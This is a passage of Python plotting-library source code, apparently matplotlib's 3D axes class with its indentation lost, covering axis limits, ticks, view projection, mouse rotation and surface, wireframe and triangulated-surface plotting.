bottom, top = self.zaxis.limit_range_for_scale(bottom, top)
self.zz_viewLim.intervalx = (bottom, top)
if auto is not None:
self._autoscaleZon = bool(auto)
if emit:
self.callbacks.process('zlim_changed', self)
# Call all of the other y-axes that are shared with this one
for other in self._shared_z_axes.get_siblings(self):
if other is not self:
other.set_zlim(self.zz_viewLim.intervalx,
emit=False, auto=auto)
if (other.figure != self.figure and
other.figure.canvas is not None):
other.figure.canvas.draw_idle()
self.stale = True
return bottom, top
set_zlim = set_zlim3d
def get_xlim3d(self):
return tuple(self.xy_viewLim.intervalx)
get_xlim3d.__doc__ = maxes.Axes.get_xlim.__doc__
get_xlim = get_xlim3d
if get_xlim.__doc__ is not None:
get_xlim.__doc__ += """
.. versionchanged :: 1.1.0
This function now correctly refers to the 3D x-limits
"""
def get_ylim3d(self):
return tuple(self.xy_viewLim.intervaly)
get_ylim3d.__doc__ = maxes.Axes.get_ylim.__doc__
get_ylim = get_ylim3d
if get_ylim.__doc__ is not None:
get_ylim.__doc__ += """
.. versionchanged :: 1.1.0
This function now correctly refers to the 3D y-limits.
"""
def get_zlim3d(self):
'''Get 3D z limits.'''
return tuple(self.zz_viewLim.intervalx)
get_zlim = get_zlim3d
def get_zscale(self):
"""
Return the zaxis scale string %s
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
""" % (", ".join(mscale.get_scale_names()))
return self.zaxis.get_scale()
# We need to slightly redefine these to pass scalez=False
# to their calls of autoscale_view.
def set_xscale(self, value, **kwargs):
self.xaxis._set_scale(value, **kwargs)
self.autoscale_view(scaley=False, scalez=False)
self._update_transScale()
if maxes.Axes.set_xscale.__doc__ is not None:
set_xscale.__doc__ = maxes.Axes.set_xscale.__doc__ + """
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
def set_yscale(self, value, **kwargs):
self.yaxis._set_scale(value, **kwargs)
self.autoscale_view(scalex=False, scalez=False)
self._update_transScale()
self.stale = True
if maxes.Axes.set_yscale.__doc__ is not None:
set_yscale.__doc__ = maxes.Axes.set_yscale.__doc__ + """
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
@docstring.dedent_interpd
def set_zscale(self, value, **kwargs):
"""
Set the scaling of the z-axis: %(scale)s
ACCEPTS: [%(scale)s]
Different kwargs are accepted, depending on the scale:
%(scale_docs)s
.. note ::
Currently, Axes3D objects only supports linear scales.
Other scales may or may not work, and support for these
is improving with each release.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
self.zaxis._set_scale(value, **kwargs)
self.autoscale_view(scalex=False, scaley=False)
self._update_transScale()
self.stale = True
def set_zticks(self, *args, **kwargs):
"""
Set z-axis tick locations.
See :meth:`matplotlib.axes.Axes.set_yticks` for more details.
.. note::
Minor ticks are not supported.
.. versionadded:: 1.1.0
"""
return self.zaxis.set_ticks(*args, **kwargs)
def get_zticks(self, minor=False):
"""
Return the z ticks as a list of locations
See :meth:`matplotlib.axes.Axes.get_yticks` for more details.
.. note::
Minor ticks are not supported.
.. versionadded:: 1.1.0
"""
return self.zaxis.get_ticklocs(minor=minor)
def get_zmajorticklabels(self):
"""
Get the ztick labels as a list of Text instances
.. versionadded :: 1.1.0
"""
return cbook.silent_list('Text zticklabel',
self.zaxis.get_majorticklabels())
def get_zminorticklabels(self):
"""
Get the ztick labels as a list of Text instances
.. note::
Minor ticks are not supported. This function was added
only for completeness.
.. versionadded :: 1.1.0
"""
return cbook.silent_list('Text zticklabel',
self.zaxis.get_minorticklabels())
def set_zticklabels(self, *args, **kwargs):
"""
Set z-axis tick labels.
See :meth:`matplotlib.axes.Axes.set_yticklabels` for more details.
.. note::
Minor ticks are not supported by Axes3D objects.
.. versionadded:: 1.1.0
"""
return self.zaxis.set_ticklabels(*args, **kwargs)
def get_zticklabels(self, minor=False):
"""
Get ztick labels as a list of Text instances.
See :meth:`matplotlib.axes.Axes.get_yticklabels` for more details.
.. note::
Minor ticks are not supported.
.. versionadded:: 1.1.0
"""
return cbook.silent_list('Text zticklabel',
self.zaxis.get_ticklabels(minor=minor))
def zaxis_date(self, tz=None):
"""
Sets up z-axis ticks and labels that treat the z data as dates.
*tz* is a timezone string or :class:`tzinfo` instance.
Defaults to rc value.
.. note::
This function is merely provided for completeness.
Axes3D objects do not officially support dates for ticks,
and so this may or may not work as expected.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
self.zaxis.axis_date(tz)
def get_zticklines(self):
"""
Get ztick lines as a list of Line2D instances.
Note that this function is provided merely for completeness.
These lines are re-calculated as the display changes.
.. versionadded:: 1.1.0
"""
return self.zaxis.get_ticklines()
def clabel(self, *args, **kwargs):
"""
This function is currently not implemented for 3D axes.
Returns *None*.
"""
return None
def view_init(self, elev=None, azim=None):
"""
Set the elevation and azimuth of the axes.
This can be used to rotate the axes programmatically.
'elev' stores the elevation angle in the z plane.
'azim' stores the azimuth angle in the x,y plane.
if elev or azim are None (default), then the initial value
is used which was specified in the :class:`Axes3D` constructor.
"""
self.dist = 10
if elev is None:
self.elev = self.initial_elev
else:
self.elev = elev
if azim is None:
self.azim = self.initial_azim
else:
self.azim = azim
def set_proj_type(self, proj_type):
"""
Set the projection type.
Parameters
----------
proj_type : str
Type of projection, accepts 'persp' and 'ortho'.
"""
if proj_type == 'persp':
self._projection = proj3d.persp_transformation
elif proj_type == 'ortho':
self._projection = proj3d.ortho_transformation
else:
raise ValueError("unrecognized projection: %s" % proj_type)
def get_proj(self):
"""
Create the projection matrix from the current viewing position.
elev stores the elevation angle in the z plane
azim stores the azimuth angle in the x,y plane
dist is the distance of the eye viewing point from the object
point.
"""
relev, razim = np.pi * self.elev/180, np.pi * self.azim/180
xmin, xmax = self.get_xlim3d()
ymin, ymax = self.get_ylim3d()
zmin, zmax = self.get_zlim3d()
# transform to uniform world coordinates 0-1.0,0-1.0,0-1.0
worldM = proj3d.world_transformation(xmin, xmax,
ymin, ymax,
zmin, zmax)
# look into the middle of the new coordinates
R = np.array([0.5, 0.5, 0.5])
xp = R[0] + np.cos(razim) * np.cos(relev) * self.dist
yp = R[1] + np.sin(razim) * np.cos(relev) * self.dist
zp = R[2] + np.sin(relev) * self.dist
E = np.array((xp, yp, zp))
self.eye = E
self.vvec = R - E
self.vvec = self.vvec / proj3d.mod(self.vvec)
if abs(relev) > np.pi/2:
# upside down
V = np.array((0, 0, -1))
else:
V = np.array((0, 0, 1))
zfront, zback = -self.dist, self.dist
viewM = proj3d.view_transformation(E, R, V)
projM = self._projection(zfront, zback)
M0 = np.dot(viewM, worldM)
M = np.dot(projM, M0)
return M
def mouse_init(self, rotate_btn=1, zoom_btn=3):
"""Initializes mouse button callbacks to enable 3D rotation of
the axes. Also optionally sets the mouse buttons for 3D rotation
and zooming.
============ =======================================================
Argument Description
============ =======================================================
*rotate_btn* The integer or list of integers specifying which mouse
button or buttons to use for 3D rotation of the axes.
Default = 1.
*zoom_btn* The integer or list of integers specifying which mouse
button or buttons to use to zoom the 3D axes.
Default = 3.
============ =======================================================
"""
self.button_pressed = None
canv = self.figure.canvas
if canv is not None:
c1 = canv.mpl_connect('motion_notify_event', self._on_move)
c2 = canv.mpl_connect('button_press_event', self._button_press)
c3 = canv.mpl_connect('button_release_event', self._button_release)
self._cids = [c1, c2, c3]
else:
warnings.warn(
"Axes3D.figure.canvas is 'None', mouse rotation disabled. "
"Set canvas then call Axes3D.mouse_init().")
# coerce scalars into array-like, then convert into
# a regular list to avoid comparisons against None
# which breaks in recent versions of numpy.
self._rotate_btn = np.atleast_1d(rotate_btn).tolist()
self._zoom_btn = np.atleast_1d(zoom_btn).tolist()
def can_zoom(self):
"""
Return *True* if this axes supports the zoom box button functionality.
3D axes objects do not use the zoom box button.
"""
return False
def can_pan(self):
"""
Return *True* if this axes supports the pan/zoom button functionality.
3D axes objects do not use the pan/zoom button.
"""
return False
def cla(self):
"""
Clear axes
"""
# Disabling mouse interaction might have been needed a long
# time ago, but I can't find a reason for it now - BVR (2012-03)
#self.disable_mouse_rotation()
super().cla()
self.zaxis.cla()
if self._sharez is not None:
self.zaxis.major = self._sharez.zaxis.major
self.zaxis.minor = self._sharez.zaxis.minor
z0, z1 = self._sharez.get_zlim()
self.set_zlim(z0, z1, emit=False, auto=None)
self.zaxis._set_scale(self._sharez.zaxis.get_scale())
else:
self.zaxis._set_scale('linear')
try:
self.set_zlim(0, 1)
except TypeError:
pass
self._autoscaleZon = True
self._zmargin = 0
self.grid(rcParams['axes3d.grid'])
def disable_mouse_rotation(self):
"""Disable mouse button callbacks.
"""
# Disconnect the various events we set.
for cid in self._cids:
self.figure.canvas.mpl_disconnect(cid)
self._cids = []
def _button_press(self, event):
if event.inaxes == self:
self.button_pressed = event.button
self.sx, self.sy = event.xdata, event.ydata
def _button_release(self, event):
self.button_pressed = None
def format_zdata(self, z):
"""
Return *z* string formatted. This function will use the
:attr:`fmt_zdata` attribute if it is callable, else will fall
back on the zaxis major formatter
"""
try: return self.fmt_zdata(z)
except (AttributeError, TypeError):
func = self.zaxis.get_major_formatter().format_data_short
val = func(z)
return val
def format_coord(self, xd, yd):
"""
Given the 2D view coordinates attempt to guess a 3D coordinate.
Looks for the nearest edge to the point and then assumes that
the point is at the same z location as the nearest point on the edge.
"""
if self.M is None:
return ''
if self.button_pressed in self._rotate_btn:
return 'azimuth={:.0f} deg, elevation={:.0f} deg '.format(
self.azim, self.elev)
# ignore xd and yd and display angles instead
# nearest edge
p0, p1 = min(self.tunit_edges(),
key=lambda edge: proj3d.line2d_seg_dist(
edge[0], edge[1], (xd, yd)))
# scale the z value to match
x0, y0, z0 = p0
x1, y1, z1 = p1
d0 = np.hypot(x0-xd, y0-yd)
d1 = np.hypot(x1-xd, y1-yd)
dt = d0+d1
z = d1/dt * z0 + d0/dt * z1
x, y, z = proj3d.inv_transform(xd, yd, z, self.M)
xs = self.format_xdata(x)
ys = self.format_ydata(y)
zs = self.format_zdata(z)
return 'x=%s, y=%s, z=%s' % (xs, ys, zs)
def _on_move(self, event):
"""Mouse moving
button-1 rotates by default. Can be set explicitly in mouse_init().
button-3 zooms by default. Can be set explicitly in mouse_init().
"""
if not self.button_pressed:
return
if self.M is None:
return
x, y = event.xdata, event.ydata
# In case the mouse is out of bounds.
if x is None:
return
dx, dy = x - self.sx, y - self.sy
w = self._pseudo_w
h = self._pseudo_h
self.sx, self.sy = x, y
# Rotation
if self.button_pressed in self._rotate_btn:
# rotate viewing point
# get the x and y pixel coords
if dx == 0 and dy == 0:
return
self.elev = art3d.norm_angle(self.elev - (dy/h)*180)
self.azim = art3d.norm_angle(self.azim - (dx/w)*180)
self.get_proj()
self.stale = True
self.figure.canvas.draw_idle()
# elif self.button_pressed == 2:
# pan view
# project xv,yv,zv -> xw,yw,zw
# pan
# pass
# Zoom
elif self.button_pressed in self._zoom_btn:
# zoom view
# hmmm..this needs some help from clipping....
minx, maxx, miny, maxy, minz, maxz = self.get_w_lims()
df = 1-((h - dy)/h)
dx = (maxx-minx)*df
dy = (maxy-miny)*df
dz = (maxz-minz)*df
self.set_xlim3d(minx - dx, maxx + dx)
self.set_ylim3d(miny - dy, maxy + dy)
self.set_zlim3d(minz - dz, maxz + dz)
self.get_proj()
self.figure.canvas.draw_idle()
def set_zlabel(self, zlabel, fontdict=None, labelpad=None, **kwargs):
'''
Set zlabel. See doc for :meth:`set_ylabel` for description.
'''
if labelpad is not None : self.zaxis.labelpad = labelpad
return self.zaxis.set_label_text(zlabel, fontdict, **kwargs)
def get_zlabel(self):
"""
Get the z-label text string.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
label = self.zaxis.get_label()
return label.get_text()
#### Axes rectangle characteristics
def get_frame_on(self):
"""
Get whether the 3D axes panels are drawn.
.. versionadded :: 1.1.0
"""
return self._frameon
def set_frame_on(self, b):
"""
Set whether the 3D axes panels are drawn.
.. versionadded :: 1.1.0
Parameters
----------
b : bool
"""
self._frameon = bool(b)
self.stale = True
def grid(self, b=True, **kwargs):
'''
Set / unset 3D grid.
.. note::
Currently, this function does not behave the same as
:meth:`matplotlib.axes.Axes.grid`, but it is intended to
eventually support that behavior.
.. versionchanged :: 1.1.0
This function was changed, but not tested. Please report any bugs.
'''
# TODO: Operate on each axes separately
if len(kwargs):
b = True
self._draw_grid = cbook._string_to_bool(b)
self.stale = True
def ticklabel_format(
self, *, style='', scilimits=None, useOffset=None, axis='both'):
"""
Convenience method for manipulating the ScalarFormatter
used by default for linear axes in Axed3D objects.
See :meth:`matplotlib.axes.Axes.ticklabel_format` for full
documentation. Note that this version applies to all three
axes of the Axes3D object. Therefore, the *axis* argument
will also accept a value of 'z' and the value of 'both' will
apply to all three axes.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
style = style.lower()
axis = axis.lower()
if scilimits is not None:
try:
m, n = scilimits
m+n+1 # check that both are numbers
except (ValueError, TypeError):
raise ValueError("scilimits must be a sequence of 2 integers")
if style[:3] == 'sci':
sb = True
elif style == 'plain':
sb = False
elif style == '':
sb = None
else:
raise ValueError("%s is not a valid style value")
try:
if sb is not None:
if axis in ['both', 'z']:
self.xaxis.major.formatter.set_scientific(sb)
if axis in ['both', 'y']:
self.yaxis.major.formatter.set_scientific(sb)
if axis in ['both', 'z'] :
self.zaxis.major.formatter.set_scientific(sb)
if scilimits is not None:
if axis in ['both', 'x']:
self.xaxis.major.formatter.set_powerlimits(scilimits)
if axis in ['both', 'y']:
self.yaxis.major.formatter.set_powerlimits(scilimits)
if axis in ['both', 'z']:
self.zaxis.major.formatter.set_powerlimits(scilimits)
if useOffset is not None:
if axis in ['both', 'x']:
self.xaxis.major.formatter.set_useOffset(useOffset)
if axis in ['both', 'y']:
self.yaxis.major.formatter.set_useOffset(useOffset)
if axis in ['both', 'z']:
self.zaxis.major.formatter.set_useOffset(useOffset)
except AttributeError:
raise AttributeError(
"This method only works with the ScalarFormatter.")
def locator_params(self, axis='both', tight=None, **kwargs):
"""
Convenience method for controlling tick locators.
See :meth:`matplotlib.axes.Axes.locator_params` for full
documentation. Note that this is for Axes3D objects,
therefore, setting *axis* to 'both' will result in the
parameters being set for all three axes. Also, *axis*
can also take a value of 'z' to apply parameters to the
z axis.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
_x = axis in ['x', 'both']
_y = axis in ['y', 'both']
_z = axis in ['z', 'both']
if _x:
self.xaxis.get_major_locator().set_params(**kwargs)
if _y:
self.yaxis.get_major_locator().set_params(**kwargs)
if _z:
self.zaxis.get_major_locator().set_params(**kwargs)
self.autoscale_view(tight=tight, scalex=_x, scaley=_y, scalez=_z)
def tick_params(self, axis='both', **kwargs):
"""
Convenience method for changing the appearance of ticks and
tick labels.
See :meth:`matplotlib.axes.Axes.tick_params` for more complete
documentation.
The only difference is that setting *axis* to 'both' will
mean that the settings are applied to all three axes. Also,
the *axis* parameter also accepts a value of 'z', which
would mean to apply to only the z-axis.
Also, because of how Axes3D objects are drawn very differently
from regular 2D axes, some of these settings may have
ambiguous meaning. For simplicity, the 'z' axis will
accept settings as if it was like the 'y' axis.
.. note::
While this function is currently implemented, the core part
of the Axes3D object may ignore some of these settings.
Future releases will fix this. Priority will be given to
those who file bugs.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
super().tick_params(axis, **kwargs)
if axis in ['z', 'both'] :
zkw = dict(kwargs)
zkw.pop('top', None)
zkw.pop('bottom', None)
zkw.pop('labeltop', None)
zkw.pop('labelbottom', None)
self.zaxis.set_tick_params(**zkw)
### data limits, ticks, tick labels, and formatting
def invert_zaxis(self):
"""
Invert the z-axis.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
bottom, top = self.get_zlim()
self.set_zlim(top, bottom, auto=None)
def zaxis_inverted(self):
'''
Returns True if the z-axis is inverted.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
'''
bottom, top = self.get_zlim()
return top < bottom
def get_zbound(self):
"""
Returns the z-axis numerical bounds where::
lowerBound < upperBound
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
bottom, top = self.get_zlim()
if bottom < top:
return bottom, top
else:
return top, bottom
def set_zbound(self, lower=None, upper=None):
"""
Set the lower and upper numerical bounds of the z-axis.
This method will honor axes inversion regardless of parameter order.
It will not change the :attr:`_autoscaleZon` attribute.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if upper is None and cbook.iterable(lower):
lower,upper = lower
old_lower,old_upper = self.get_zbound()
if lower is None: lower = old_lower
if upper is None: upper = old_upper
if self.zaxis_inverted():
if lower < upper:
self.set_zlim(upper, lower, auto=None)
else:
self.set_zlim(lower, upper, auto=None)
else :
if lower < upper:
self.set_zlim(lower, upper, auto=None)
else :
self.set_zlim(upper, lower, auto=None)
def text(self, x, y, z, s, zdir=None, **kwargs):
'''
Add text to the plot. kwargs will be passed on to Axes.text,
except for the `zdir` keyword, which sets the direction to be
used as the z direction.
'''
text = super().text(x, y, s, **kwargs)
art3d.text_2d_to_3d(text, z, zdir)
return text
text3D = text
text2D = Axes.text
def plot(self, xs, ys, *args, zdir='z', **kwargs):
'''
Plot 2D or 3D data.
========== ================================================
Argument Description
========== ================================================
*xs*, *ys* x, y coordinates of vertices
*zs* z value(s), either one for all points or one for
each point.
*zdir* Which direction to use as z ('x', 'y' or 'z')
when plotting a 2D set.
========== ================================================
Other arguments are passed on to
:func:`~matplotlib.axes.Axes.plot`
'''
had_data = self.has_data()
# `zs` can be passed positionally or as keyword; checking whether
# args[0] is a string matches the behavior of 2D `plot` (via
# `_process_plot_var_args`).
if args and not isinstance(args[0], str):
zs = args[0]
args = args[1:]
if 'zs' in kwargs:
raise TypeError("plot() for multiple values for argument 'z'")
else:
zs = kwargs.pop('zs', 0)
# Match length
zs = np.broadcast_to(zs, len(xs))
lines = super().plot(xs, ys, *args, **kwargs)
for line in lines:
art3d.line_2d_to_3d(line, zs=zs, zdir=zdir)
xs, ys, zs = art3d.juggle_axes(xs, ys, zs, zdir)
self.auto_scale_xyz(xs, ys, zs, had_data)
return lines
plot3D = plot
def plot_surface(self, X, Y, Z, *args, norm=None, vmin=None,
vmax=None, lightsource=None, **kwargs):
"""
Create a surface plot.
By default it will be colored in shades of a solid color, but it also
supports color mapping by supplying the *cmap* argument.
.. note::
The *rcount* and *ccount* kwargs, which both default to 50,
determine the maximum number of samples used in each direction. If
the input data is larger, it will be downsampled (by slicing) to
these numbers of points.
Parameters
----------
X, Y, Z : 2d arrays
Data values.
rcount, ccount : int
Maximum number of samples used in each direction. If the input
data is larger, it will be downsampled (by slicing) to these
numbers of points. Defaults to 50.
.. versionadded:: 2.0
rstride, cstride : int
Downsampling stride in each direction. These arguments are
mutually exclusive with *rcount* and *ccount*. If only one of
*rstride* or *cstride* is set, the other defaults to 10.
'classic' mode uses a default of ``rstride = cstride = 10`` instead
of the new default of ``rcount = ccount = 50``.
color : color-like
Color of the surface patches.
cmap : Colormap
Colormap of the surface patches.
facecolors : array-like of colors.
Colors of each individual patch.
norm : Normalize
Normalization for the colormap.
vmin, vmax : float
Bounds for the normalization.
shade : bool
Whether to shade the face colors.
**kwargs :
Other arguments are forwarded to `.Poly3DCollection`.
"""
had_data = self.has_data()
if Z.ndim != 2:
raise ValueError("Argument Z must be 2-dimensional.")
# TODO: Support masked arrays
X, Y, Z = np.broadcast_arrays(X, Y, Z)
rows, cols = Z.shape
has_stride = 'rstride' in kwargs or 'cstride' in kwargs
has_count = 'rcount' in kwargs or 'ccount' in kwargs
if has_stride and has_count:
raise ValueError("Cannot specify both stride and count arguments")
rstride = kwargs.pop('rstride', 10)
cstride = kwargs.pop('cstride', 10)
rcount = kwargs.pop('rcount', 50)
ccount = kwargs.pop('ccount', 50)
if rcParams['_internal.classic_mode']:
# Strides have priority over counts in classic mode.
# So, only compute strides from counts
# if counts were explicitly given
compute_strides = has_count
else:
# If the strides are provided then it has priority.
# Otherwise, compute the strides from the counts.
compute_strides = not has_stride
if compute_strides:
rstride = int(max(np.ceil(rows / rcount), 1))
cstride = int(max(np.ceil(cols / ccount), 1))
if 'facecolors' in kwargs:
fcolors = kwargs.pop('facecolors')
else:
color = kwargs.pop('color', None)
if color is None:
color = self._get_lines.get_next_color()
color = np.array(mcolors.to_rgba(color))
fcolors = None
cmap = kwargs.get('cmap', None)
shade = kwargs.pop('shade', cmap is None)
# Shade the data
if shade and cmap is not None and fcolors is not None:
fcolors = self._shade_colors_lightsource(Z, cmap, lightsource)
# evenly spaced, and including both endpoints
row_inds = list(range(0, rows-1, rstride)) + [rows-1]
col_inds = list(range(0, cols-1, cstride)) + [cols-1]
colset = [] # the sampled facecolor
polys = []
for rs, rs_next in zip(row_inds[:-1], row_inds[1:]):
for cs, cs_next in zip(col_inds[:-1], col_inds[1:]):
ps = [
# +1 ensures we share edges between polygons
cbook._array_perimeter(a[rs:rs_next+1, cs:cs_next+1])
for a in (X, Y, Z)
]
# ps = np.stack(ps, axis=-1)
ps = np.array(ps).T
polys.append(ps)
if fcolors is not None:
colset.append(fcolors[rs][cs])
def get_normals(polygons):
"""
Takes a list of polygons and return an array of their normals
"""
v1 = np.empty((len(polygons), 3))
v2 = np.empty((len(polygons), 3))
for poly_i, ps in enumerate(polygons):
# pick three points around the polygon at which to find the normal
# doesn't vectorize because polygons is jagged
i1, i2, i3 = 0, len(ps)//3, 2*len(ps)//3
v1[poly_i, :] = ps[i1, :] - ps[i2, :]
v2[poly_i, :] = ps[i2, :] - ps[i3, :]
return np.cross(v1, v2)
# note that the striding causes some polygons to have more coordinates
# than others
polyc = art3d.Poly3DCollection(polys, *args, **kwargs)
if fcolors is not None:
if shade:
colset = self._shade_colors(colset, get_normals(polys))
polyc.set_facecolors(colset)
polyc.set_edgecolors(colset)
elif cmap:
# doesn't vectorize because polys is jagged
avg_z = np.array([ps[:,2].mean() for ps in polys])
polyc.set_array(avg_z)
if vmin is not None or vmax is not None:
polyc.set_clim(vmin, vmax)
if norm is not None:
polyc.set_norm(norm)
else:
if shade:
colset = self._shade_colors(color, get_normals(polys))
else:
colset = color
polyc.set_facecolors(colset)
self.add_collection(polyc)
self.auto_scale_xyz(X, Y, Z, had_data)
return polyc
def _generate_normals(self, polygons):
'''
Generate normals for polygons by using the first three points.
This normal of course might not make sense for polygons with
more than three points not lying in a plane.
'''
normals = []
for verts in polygons:
v1 = np.array(verts[0]) - np.array(verts[1])
v2 = np.array(verts[2]) - np.array(verts[0])
normals.append(np.cross(v1, v2))
return normals
def _shade_colors(self, color, normals):
'''
Shade *color* using normal vectors given by *normals*.
*color* can also be an array of the same length as *normals*.
'''
shade = np.array([np.dot(n / proj3d.mod(n), [-1, -1, 0.5])
if proj3d.mod(n) else np.nan
for n in normals])
mask = ~np.isnan(shade)
if len(shade[mask]) > 0:
norm = Normalize(min(shade[mask]), max(shade[mask]))
shade[~mask] = min(shade[mask])
color = mcolors.to_rgba_array(color)
# shape of color should be (M, 4) (where M is number of faces)
# shape of shade should be (M,)
# colors should have final shape of (M, 4)
alpha = color[:, 3]
colors = (0.5 + norm(shade)[:, np.newaxis] * 0.5) * color
colors[:, 3] = alpha
else:
colors = np.asanyarray(color).copy()
return colors
def _shade_colors_lightsource(self, data, cmap, lightsource):
if lightsource is None:
lightsource = LightSource(azdeg=135, altdeg=55)
return lightsource.shade(data, cmap)
def plot_wireframe(self, X, Y, Z, *args, **kwargs):
"""
Plot a 3D wireframe.
.. note::
The *rcount* and *ccount* kwargs, which both default to 50,
determine the maximum number of samples used in each direction. If
the input data is larger, it will be downsampled (by slicing) to
these numbers of points.
Parameters
----------
X, Y, Z : 2d arrays
Data values.
rcount, ccount : int
Maximum number of samples used in each direction. If the input
data is larger, it will be downsampled (by slicing) to these
numbers of points. Setting a count to zero causes the data to be
not sampled in the corresponding direction, producing a 3D line
plot rather than a wireframe plot. Defaults to 50.
.. versionadded:: 2.0
rstride, cstride : int
Downsampling stride in each direction. These arguments are
mutually exclusive with *rcount* and *ccount*. If only one of
*rstride* or *cstride* is set, the other defaults to 1. Setting a
stride to zero causes the data to be not sampled in the
corresponding direction, producing a 3D line plot rather than a
wireframe plot.
'classic' mode uses a default of ``rstride = cstride = 1`` instead
of the new default of ``rcount = ccount = 50``.
**kwargs :
Other arguments are forwarded to `.Line3DCollection`.
"""
had_data = self.has_data()
if Z.ndim != 2:
raise ValueError("Argument Z must be 2-dimensional.")
# FIXME: Support masked arrays
X, Y, Z = np.broadcast_arrays(X, Y, Z)
rows, cols = Z.shape
has_stride = 'rstride' in kwargs or 'cstride' in kwargs
has_count = 'rcount' in kwargs or 'ccount' in kwargs
if has_stride and has_count:
raise ValueError("Cannot specify both stride and count arguments")
rstride = kwargs.pop('rstride', 1)
cstride = kwargs.pop('cstride', 1)
rcount = kwargs.pop('rcount', 50)
ccount = kwargs.pop('ccount', 50)
if rcParams['_internal.classic_mode']:
# Strides have priority over counts in classic mode.
# So, only compute strides from counts
# if counts were explicitly given
if has_count:
rstride = int(max(np.ceil(rows / rcount), 1)) if rcount else 0
cstride = int(max(np.ceil(cols / ccount), 1)) if ccount else 0
else:
# If the strides are provided then it has priority.
# Otherwise, compute the strides from the counts.
if not has_stride:
rstride = int(max(np.ceil(rows / rcount), 1)) if rcount else 0
cstride = int(max(np.ceil(cols / ccount), 1)) if ccount else 0
# We want two sets of lines, one running along the "rows" of
# Z and another set of lines running along the "columns" of Z.
# This transpose will make it easy to obtain the columns.
tX, tY, tZ = np.transpose(X), np.transpose(Y), np.transpose(Z)
if rstride:
rii = list(range(0, rows, rstride))
# Add the last index only if needed
if rows > 0 and rii[-1] != (rows - 1):
rii += [rows-1]
else:
rii = []
if cstride:
cii = list(range(0, cols, cstride))
# Add the last index only if needed
if cols > 0 and cii[-1] != (cols - 1):
cii += [cols-1]
else:
cii = []
if rstride == 0 and cstride == 0:
raise ValueError("Either rstride or cstride must be non zero")
# If the inputs were empty, then just
# reset everything.
if Z.size == 0:
rii = []
cii = []
xlines = [X[i] for i in rii]
ylines = [Y[i] for i in rii]
zlines = [Z[i] for i in rii]
txlines = [tX[i] for i in cii]
tylines = [tY[i] for i in cii]
tzlines = [tZ[i] for i in cii]
lines = ([list(zip(xl, yl, zl))
for xl, yl, zl in zip(xlines, ylines, zlines)]
+ [list(zip(xl, yl, zl))
for xl, yl, zl in zip(txlines, tylines, tzlines)])
linec = art3d.Line3DCollection(lines, *args, **kwargs)
self.add_collection(linec)
self.auto_scale_xyz(X, Y, Z, had_data)
return linec
def plot_trisurf(self, *args, color=None, norm=None, vmin=None, vmax=None,
lightsource=None, **kwargs):
"""
============= ================================================
Argument Description
============= ================================================
*X*, *Y*, *Z* Data values as 1D arrays
*color* Color of the surface patches
*cmap* A colormap for the surface patches.
*norm* An instance of Normalize to map values to colors
*vmin* Minimum value to map
*vmax* Maximum value to map
*shade* Whether to shade the facecolors
============= ================================================
The (optional) triangulation can be specified in one of two ways;
either::
plot_trisurf(triangulation, ...)
where triangulation is a :class:`~matplotlib.tri.Triangulation`
object, or::
plot_trisurf(X, Y, ...)
plot_trisurf(X, Y, triangles, ...)
plot_trisurf(X, Y, triangles=triangles, ...)
in which case a Triangulation object will be created. See
:class:`~matplotlib.tri.Triangulation` for a explanation of
these possibilities.
The remaining arguments are::
plot_trisurf(..., Z)
where *Z* is the array of values to contour, one per point
in the triangulation.
Other arguments are passed on to
:class:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
**Examples:**
.. plot:: gallery/mplot3d/trisurf3d.py
.. plot:: gallery/mplot3d/trisurf3d_2.py
.. versionadded:: 1.2.0
This plotting function was added for the v1.2.0 release.
"""
had_data = self.has_data()
# TODO: Support custom face colours
if color is None:
color = self._get_lines.get_next_color()
color = np.array(mcolors.to_rgba(color))
cmap = kwargs.get('cmap', None)
shade = kwargs.pop('shade', cmap is None)
tri, args, kwargs = Triangulation.get_from_args_and_kwargs(*args, **kwargs)
if 'Z' in kwargs:
z = np.asarray(kwargs.pop('Z'))
else:
z = np.asarray(args[0])
# We do this so Z doesn't get passed as an arg to PolyCollection
args = args[1:]
triangles = tri.get_masked_triangles()
xt = tri.x[triangles]
yt = tri.y[triangles]
zt = z[triangles]
verts = np.stack((xt, yt, zt), axis=-1)
polyc = art3d.Poly3DCollection(verts, *args, **kwargs)
if cmap:
# average over the three points of each triangle
avg_z = verts[:, :, 2].mean(axis=1)
polyc.set_array(avg_z)
if vmin is not None or vmax is not None:
polyc.set_clim(vmin, vmax)
if norm is not None:
polyc.set_norm(norm)
else:
if shade:
v1 = verts[:, 0, :] - verts[:, 1, :]
v2 = verts[:, 1, :] - verts[:, 2, :]
normals = np.cross(v1, v2)
colset = self._shade_colors(color, normals)
else:
colset = color
polyc.set_facecolors(colset)
self.add_collection(polyc)
self.auto_scale_xyz(tri.x, tri.y, z, had_data)
return polyc
def _3d_extend_contour(self, cset, stride=5):
'''
Extend a contour in 3D by creating
'''
levels = cset.levels
colls = cset.collections
dz = (levels[1] - levels[0]) / 2
for z, linec in zip(levels, colls):
paths = linec.get_paths()
if not paths:
continue
topverts = art3d.paths_to_3d_segments(paths, z - dz)
botverts = art3d.paths_to_3d_segments(paths, z + dz)
color = linec.get_color()[0]
polyverts = []
normals = []
nsteps = np.round(len(topverts[0]) / stride)
if nsteps <= 1:
if len(topverts[0]) > 1:
nsteps = 2
else:
continue
stepsize = (len(topverts[0]) - 1) / (nsteps - 1)
for i in range(int(np.round(nsteps)) - 1):
i1 = int(np.round(i * stepsize))
i2 = int(np.round((i + 1) * stepsize))
polyverts.append([topverts[0][i1],
topverts[0][i2],
botverts[0][i2],
botverts[0][i1]])
v1 = np.array(topverts[0][i1]) - np.array(topverts[0][i2])
